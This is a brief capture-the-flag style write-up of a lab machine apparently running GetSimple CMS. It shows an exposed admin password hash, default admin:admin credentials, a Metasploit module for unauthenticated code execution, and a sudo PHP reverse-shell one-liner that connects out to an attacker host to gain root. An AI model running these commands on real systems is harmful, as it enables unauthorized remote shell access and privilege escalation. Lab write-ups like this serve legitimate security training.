Academy

Personal Rating: Easy

For this Starting Point box I do not have much documentation.

At http://10.129.70.149/data/users/admin.xml there was some interesting information to be found:

<item>
<USR>admin</USR>
<NAME/>
<PWD>d033e22ae348aeb5660fc2140aec35850c4da997</PWD>
<EMAIL>admin@gettingstarted.com</EMAIL>
<HTMLEDITOR>1</HTMLEDITOR>
<TIMEZONE/>
<LANG>en_US</LANG>
</item>

I could also log into http://10.129.70.149/admin/settings.php with the very easy to guess credentials admin:admin

SSH with either of the two credential sets did not work

From the other information I had about the page and webserver I used searchsploit to find a likely vulnerability. This module worked to get a meterpreter shell: exploit/multi/http/getsimplecms_unauth_code_exec

With that I could get a user shell as www-data

sudo -l shew me that php could be executed as admin from the www-data user (SUID binary), so I used this PHP reverse shell:

sudo php -r '$sock=fsockopen("10.10.15.13",4488);exec("/bin/sh -i <&3 >&3 2>&3");'

(with sudo nc -lnvp 4488) on my host

With that I already had a working shell on the box as root